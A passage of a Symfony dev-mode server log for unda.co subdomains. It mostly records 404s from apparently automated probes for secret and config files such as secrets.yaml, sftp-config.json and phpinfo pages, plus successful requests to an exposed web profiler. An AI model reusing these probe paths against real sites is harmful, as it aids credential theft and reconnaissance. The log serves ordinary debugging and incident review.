  8096. [2025-12-20 20:28:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8097. [2025-12-20 20:28:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.php/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.php/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8098. [2025-12-20 20:28:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8099. [2025-12-20 20:29:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /insta-compose.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /insta-compose.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8100. [2025-12-20 20:29:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /launchSettings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /launchSettings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8101. [2025-12-20 20:30:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /main.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /main.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8102. [2025-12-20 20:30:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /manifest.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /manifest.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8103. [2025-12-20 20:30:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /manifest.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /manifest.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8104. [2025-12-20 20:30:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /meteor.settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /meteor.settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8105. [2025-12-20 20:30:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /minio.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /minio.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8106. [2025-12-20 20:30:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /minio.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /minio.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8107. [2025-12-20 20:30:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /model/config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /model/config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8108. [2025-12-20 20:30:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /myproject/settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /myproject/settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8109. [2025-12-20 20:30:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /netlify.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /netlify.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8110. [2025-12-20 20:31:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /notes.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /notes.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8111. [2025-12-20 20:31:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8112. [2025-12-20 20:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo.php3"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo.php3\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8113. [2025-12-20 20:32:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo.php4"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo.php4\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8114. [2025-12-20 20:32:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo.php5"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo.php5\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8115. [2025-12-20 20:32:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  8116. [2025-12-20 20:32:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prevlaravel/sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prevlaravel/sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8117. [2025-12-20 20:32:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /private/config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /private/config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8118. [2025-12-20 20:32:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /providers/aws.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /providers/aws.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8119. [2025-12-20 20:32:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"060c3c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/060c3c","method":"GET"} []
  8120. [2025-12-20 20:32:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  8121. [2025-12-20 20:33:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/client/planinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/client/planinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8122. [2025-12-20 20:33:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /readme.md"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /readme.md\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8123. [2025-12-20 20:33:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /recipes/elb.rb."" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /recipes/elb.rb.\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8124. [2025-12-20 20:33:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /secrets.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /secrets.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8125. [2025-12-20 20:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /secrets.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /secrets.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8126. [2025-12-20 20:33:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6eb557","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6eb557?panel=dump","method":"GET"} []
  8127. [2025-12-20 20:33:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  8128. [2025-12-20 20:34:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"417fde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/417fde?panel=router","method":"GET"} []
  8129. [2025-12-20 20:34:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  8130. [2025-12-20 20:35:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/main.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/main.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8131. [2025-12-20 20:35:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server/src/util/s3_operation.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server/src/util/s3_operation.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8132. [2025-12-20 20:35:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8133. [2025-12-20 20:35:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8134. [2025-12-20 20:36:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8135. [2025-12-20 20:36:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8136. [2025-12-20 20:36:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8137. [2025-12-20 20:36:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /shared/backend/aws/identity.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /shared/backend/aws/identity.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8138. [2025-12-20 20:36:44] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  8139. [2025-12-20 20:36:49] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  8140. [2025-12-20 20:36:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  8141. [2025-12-20 20:36:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8142. [2025-12-20 20:36:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8143. [2025-12-20 20:36:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8144. [2025-12-20 20:36:49] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  8145. [2025-12-20 20:36:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  8146. [2025-12-20 20:36:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8147. [2025-12-20 20:36:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8148. [2025-12-20 20:36:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  8149. [2025-12-20 20:36:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  8150. [2025-12-20 20:36:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  8151. [2025-12-20 20:36:49] security.DEBUG: Calling Authentication entry point. [] []
  8152. [2025-12-20 20:36:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  8153. [2025-12-20 20:36:49] security.DEBUG: Calling Authentication entry point. [] []
  8154. [2025-12-20 20:36:49] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  8155. [2025-12-20 20:36:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src/app/services/aws.service.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src/app/services/aws.service.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
